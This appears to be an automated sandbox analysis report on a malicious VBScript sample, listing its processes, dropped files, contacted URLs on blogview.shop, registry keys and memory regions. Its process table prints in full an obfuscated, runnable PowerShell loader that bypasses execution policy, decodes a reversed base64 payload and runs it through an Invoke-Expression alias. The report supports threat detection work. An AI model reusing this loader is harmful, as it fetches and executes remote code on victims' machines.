Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
F1ATty1iXD.vbs
|
ASCII text, with very long lines (1397), with CRLF, LF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpt1ontw.44g.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gexgdqu5.uwo.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F1ATty1iXD.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code =
'==Qf7kSewJHZkwyJzg2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8yMoNXZyZWZy9iNzMjNwkjM3QzN3cDM5MDO5UjN18yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c'
;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64))
;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://blogview.shop/api/values/56598390777472906336/refresh3/
|
unknown
|
||
|
https://blogview.shop/api/values/56598390777472906336/refresh3/X
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://blogview.shop/api/values/56598390777472906336/refresh3/1049382567.txtTEM320
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://blogview.shop/api/values/56598390777472906336/refresh3/1049382567.txt
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://blogview.shop/api/values/
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://blogview.shop/api/values/refresh3
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://blogview.shop
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://blogview.shop/api/values/refresh3X
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 10 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
blogview.shop
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
220F5097000
|
heap
|
page read and write
|
|
|
|
220DCEDE000
|
trusted library allocation
|
page read and write
|
|
|
|
20E98398000
|
heap
|
page read and write
|
||
|
220DE6C7000
|
trusted library allocation
|
page read and write
|
||
|
220DCB46000
|
heap
|
page read and write
|
||
|
230407E000
|
stack
|
page read and write
|
||
|
C7D50FD000
|
stack
|
page read and write
|
||
|
220DCC60000
|
heap
|
page execute and read and write
|
||
|
220DB08D000
|
heap
|
page read and write
|
||
|
220DD1EF000
|
trusted library allocation
|
page read and write
|
||
|
20E983B7000
|
heap
|
page read and write
|
||
|
20E98390000
|
heap
|
page read and write
|
||
|
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
|
20E98398000
|
heap
|
page read and write
|
||
|
C7D51FE000
|
stack
|
page read and write
|
||
|
20E99D90000
|
heap
|
page read and write
|
||
|
7FFAAC7D0000
|
trusted library allocation
|
page read and write
|
||
|
220DCB59000
|
heap
|
page read and write
|
||
|
23044FD000
|
stack
|
page read and write
|
||
|
230463E000
|
stack
|
page read and write
|
||
|
7FFAAC7E0000
|
trusted library allocation
|
page read and write
|
||
|
220DB1D0000
|
heap
|
page read and write
|
||
|
7FFB1A746000
|
unkown
|
page readonly
|
||
|
20E98655000
|
heap
|
page read and write
|
||
|
7FFB1A752000
|
unkown
|
page readonly
|
||
|
7FFAAC790000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
20E98360000
|
heap
|
page read and write
|
||
|
20E98372000
|
heap
|
page read and write
|
||
|
20E9838A000
|
heap
|
page read and write
|
||
|
220F504F000
|
heap
|
page read and write
|
||
|
20E983C0000
|
heap
|
page read and write
|
||
|
7FFB1A752000
|
unkown
|
page readonly
|
||
|
7FFAAC540000
|
trusted library allocation
|
page read and write
|
||
|
20E98310000
|
heap
|
page read and write
|
||
|
220DC9B0000
|
trusted library allocation
|
page read and write
|
||
|
2303CD3000
|
stack
|
page read and write
|
||
|
230437E000
|
stack
|
page read and write
|
||
|
7FFAAC840000
|
trusted library allocation
|
page read and write
|
||
|
20E9840C000
|
heap
|
page read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page execute and read and write
|
||
|
220DE6C0000
|
trusted library allocation
|
page read and write
|
||
|
230417C000
|
stack
|
page read and write
|
||
|
220ECCB1000
|
trusted library allocation
|
page read and write
|
||
|
2303D5D000
|
stack
|
page read and write
|
||
|
2303D9E000
|
stack
|
page read and write
|
||
|
220DC9F0000
|
trusted library allocation
|
page read and write
|
||
|
20E9A100000
|
heap
|
page read and write
|
||
|
220F5518000
|
heap
|
page read and write
|
||
|
220ECD25000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC54B000
|
trusted library allocation
|
page read and write
|
||
|
220DB150000
|
heap
|
page read and write
|
||
|
20E98330000
|
heap
|
page read and write
|
||
|
220F51D0000
|
heap
|
page execute and read and write
|
||
|
220DE308000
|
trusted library allocation
|
page read and write
|
||
|
220DCA60000
|
heap
|
page read and write
|
||
|
220F54D3000
|
heap
|
page read and write
|
||
|
20E9838B000
|
heap
|
page read and write
|
||
|
220DC980000
|
trusted library allocation
|
page read and write
|
||
|
220DB083000
|
heap
|
page read and write
|
||
|
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
|
220DB010000
|
heap
|
page read and write
|
||
|
7FFAAC616000
|
trusted library allocation
|
page execute and read and write
|
||
|
20E983D0000
|
heap
|
page read and write
|
||
|
220DD125000
|
trusted library allocation
|
page read and write
|
||
|
C7D4DFE000
|
stack
|
page read and write
|
||
|
220F5514000
|
heap
|
page read and write
|
||
|
220DB055000
|
heap
|
page read and write
|
||
|
220DB040000
|
heap
|
page read and write
|
||
|
7FFAAC6E1000
|
trusted library allocation
|
page read and write
|
||
|
220DB1D5000
|
heap
|
page read and write
|
||
|
220DB07E000
|
heap
|
page read and write
|
||
|
20E983AF000
|
heap
|
page read and write
|
||
|
7FFAAC7B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1A755000
|
unkown
|
page readonly
|
||
|
7FFAAC7F0000
|
trusted library allocation
|
page read and write
|
||
|
220DD0C1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1A730000
|
unkown
|
page readonly
|
||
|
7FFAAC550000
|
trusted library allocation
|
page read and write
|
||
|
220DB09F000
|
heap
|
page read and write
|
||
|
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
|
20E98650000
|
heap
|
page read and write
|
||
|
220F50AD000
|
heap
|
page read and write
|
||
|
7FFAAC820000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1A750000
|
unkown
|
page read and write
|
||
|
230427E000
|
stack
|
page read and write
|
||
|
7FFAAC890000
|
trusted library allocation
|
page read and write
|
||
|
20E98230000
|
heap
|
page read and write
|
||
|
20E9840C000
|
heap
|
page read and write
|
||
|
7FFB1A750000
|
unkown
|
page read and write
|
||
|
7FFAAC800000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC850000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC880000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC860000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC533000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF477130000
|
trusted library allocation
|
page execute and read and write
|
||
|
C7D53FB000
|
stack
|
page read and write
|
||
|
20E983B3000
|
heap
|
page read and write
|
||
|
7FFAAC712000
|
trusted library allocation
|
page read and write
|
||
|
20E983C2000
|
heap
|
page read and write
|
||
|
220F54FE000
|
heap
|
page read and write
|
||
|
220DB0C6000
|
heap
|
page read and write
|
||
|
220F51D7000
|
heap
|
page execute and read and write
|
||
|
7FFAAC58C000
|
trusted library allocation
|
page execute and read and write
|
||
|
23046BE000
|
stack
|
page read and write
|
||
|
220DB1B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC700000
|
trusted library allocation
|
page execute and read and write
|
||
|
220DB190000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20E983B1000
|
heap
|
page read and write
|
||
|
20E98389000
|
heap
|
page read and write
|
||
|
20E98369000
|
heap
|
page read and write
|
||
|
7FFAAC870000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7C0000
|
trusted library allocation
|
page read and write
|
||
|
220DDBEF000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC720000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC5E6000
|
trusted library allocation
|
page read and write
|
||
|
220ECCC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1A731000
|
unkown
|
page execute read
|
||
|
7FFAAC53D000
|
trusted library allocation
|
page execute and read and write
|
||
|
20E983D0000
|
heap
|
page read and write
|
||
|
7FFB1A731000
|
unkown
|
page execute read
|
||
|
20E983B0000
|
heap
|
page read and write
|
||
|
220F54A0000
|
heap
|
page read and write
|
||
|
220DE5A2000
|
trusted library allocation
|
page read and write
|
||
|
220F54B0000
|
heap
|
page read and write
|
||
|
220DCB40000
|
heap
|
page read and write
|
||
|
7FFAAC6EA000
|
trusted library allocation
|
page read and write
|
||
|
220DCCB1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC780000
|
trusted library allocation
|
page read and write
|
||
|
23042FE000
|
stack
|
page read and write
|
||
|
220DAF10000
|
heap
|
page read and write
|
||
|
220DD1EA000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC8A0000
|
trusted library allocation
|
page read and write
|
||
|
23043FE000
|
unkown
|
page read and write
|
||
|
220F5200000
|
heap
|
page read and write
|
||
|
220ECE67000
|
trusted library allocation
|
page read and write
|
||
|
C7D4799000
|
stack
|
page read and write
|
||
|
230457E000
|
stack
|
page read and write
|
||
|
C7D4EFF000
|
stack
|
page read and write
|
||
|
220DCCA0000
|
heap
|
page execute and read and write
|
||
|
220DB089000
|
heap
|
page read and write
|
||
|
220ECF9F000
|
trusted library allocation
|
page read and write
|
||
|
220DAFF0000
|
heap
|
page read and write
|
||
|
220DE9C6000
|
trusted library allocation
|
page read and write
|
||
|
20E9840C000
|
heap
|
page read and write
|
||
|
23047BB000
|
stack
|
page read and write
|
||
|
220DE64C000
|
trusted library allocation
|
page read and write
|
||
|
220DE5F2000
|
trusted library allocation
|
page read and write
|
||
|
C7D4BFE000
|
stack
|
page read and write
|
||
|
7FFAAC830000
|
trusted library allocation
|
page read and write
|
||
|
220F4FF0000
|
heap
|
page read and write
|
||
|
220DE7CA000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1A730000
|
unkown
|
page readonly
|
||
|
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
|
20E98390000
|
heap
|
page read and write
|
||
|
220DB060000
|
heap
|
page read and write
|
||
|
220DE81C000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
|
20E9838C000
|
heap
|
page read and write
|
||
|
230518E000
|
stack
|
page read and write
|
||
|
7FFB1A755000
|
unkown
|
page readonly
|
||
|
7FFAAC532000
|
trusted library allocation
|
page read and write
|
||
|
220DCD35000
|
trusted library allocation
|
page read and write
|
||
|
20E983D0000
|
heap
|
page read and write
|
||
|
220DB1C0000
|
heap
|
page readonly
|
||
|
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC810000
|
trusted library allocation
|
page read and write
|
||
|
23041FE000
|
stack
|
page read and write
|
||
|
C7D52FF000
|
stack
|
page read and write
|
||
|
7FFAAC534000
|
trusted library allocation
|
page read and write
|
||
|
23040FE000
|
stack
|
page read and write
|
||
|
7FFB1A746000
|
unkown
|
page readonly
|
||
|
220DB0C8000
|
heap
|
page read and write
|
||
|
20E983B4000
|
heap
|
page read and write
|
||
|
220DD0C3000
|
trusted library allocation
|
page read and write
|
||
|
C7D4AFE000
|
stack
|
page read and write
|
||
|
230473E000
|
stack
|
page read and write
|
||
|
230447E000
|
stack
|
page read and write
|
There are 172 hidden memdumps, click here to show them.